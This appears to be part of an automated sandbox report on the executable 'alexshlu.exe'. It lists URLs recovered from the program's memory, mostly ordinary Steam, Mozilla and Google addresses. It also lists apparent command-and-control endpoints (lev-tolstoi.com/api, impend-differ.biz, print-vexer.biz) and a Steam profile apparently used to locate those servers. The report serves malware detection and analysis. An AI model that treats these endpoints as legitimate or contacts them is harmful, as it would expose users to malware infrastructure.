                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: alexshlu.exe, 00000003.00000003.1609739320.0000000003575000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: alexshlu.exe, 00000003.00000003.1609739320.0000000003575000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1476498651.0000000000C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://impend-differ.biz:443/apiG
                Source: alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1690595429.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754749506.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1607970298.0000000003576000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1609739320.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1607038049.0000000003576000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1607038049.000000000356B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1665843537.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1774860392.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1776241795.0000000003576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: alexshlu.exe, 00000003.00000003.1607970298.0000000003576000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1609739320.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1607038049.0000000003576000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1665750485.0000000003576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/Def4
                Source: alexshlu.exe, 00000003.00000003.1774860392.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1776241795.0000000003576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/HCrpisg8orLIezaCPJdZDugxC
                Source: alexshlu.exe, 00000003.00000003.1774952818.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1775631412.0000000000CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/I
                Source: alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/M
                Source: alexshlu.exe, 00000003.00000003.1665843537.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1607989247.00000000034F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/OB
                Source: alexshlu.exe, 00000003.00000003.1566499770.00000000034F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/V
                Source: alexshlu.exe, 00000003.00000002.1775631412.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1667690344.0000000003577000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1666515095.0000000003577000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1667797959.0000000003577000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754886041.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1666745070.0000000003577000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754962264.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1667392987.0000000003577000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1665750485.0000000003576000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1668322405.0000000003577000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1666818282.0000000003577000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754859898.0000000003575000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apir
                Source: alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/lB
                Source: alexshlu.exe, 00000003.00000003.1774860392.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1776241795.0000000003576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/p
                Source: alexshlu.exe, 00000003.00000003.1754859898.0000000003575000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pD
                Source: alexshlu.exe, 00000003.00000003.1690595429.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1665750485.0000000003576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: alexshlu.exe, 00000003.00000003.1665750485.0000000003576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pid
                Source: alexshlu.exe, 00000003.00000003.1690595429.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754859898.0000000003575000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/s
                Source: alexshlu.exe, 00000003.00000003.1774860392.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754859898.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1776241795.0000000003576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/t
                Source: alexshlu.exe, 00000003.00000003.1774889064.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1775564749.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754886041.0000000000C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                Source: alexshlu.exe, 00000003.00000003.1754886041.0000000000C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apil
                Source: alexshlu.exe, 00000003.00000003.1476498651.0000000000C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apirofiles/76561199724331900
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1476498651.0000000000C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://print-vexer.biz:443/api~
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: alexshlu.exe, 00000003.00000003.1754962264.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1476498651.0000000000C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/G
                Source: alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/c
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1476498651.0000000000C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000C9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900l
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
                Source: alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampower
                Source: alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com
                Source: alexshlu.exe, 00000003.00000003.1754962264.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                Source: alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: alexshlu.exe, 00000003.00000003.1609220506.0000000003814000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: alexshlu.exe, 00000003.00000003.1609220506.0000000003814000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.comHI2
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: alexshlu.exe, 00000003.00000003.1609117324.00000000035FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: alexshlu.exe, 00000003.00000003.1609220506.0000000003814000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                Source: alexshlu.exe, 00000003.00000003.1609220506.0000000003814000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                Source: alexshlu.exe, 00000003.00000003.1609220506.0000000003814000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: alexshlu.exe, 00000003.00000003.1609220506.0000000003814000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: alexshlu.exe, 00000003.00000003.1754962264.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
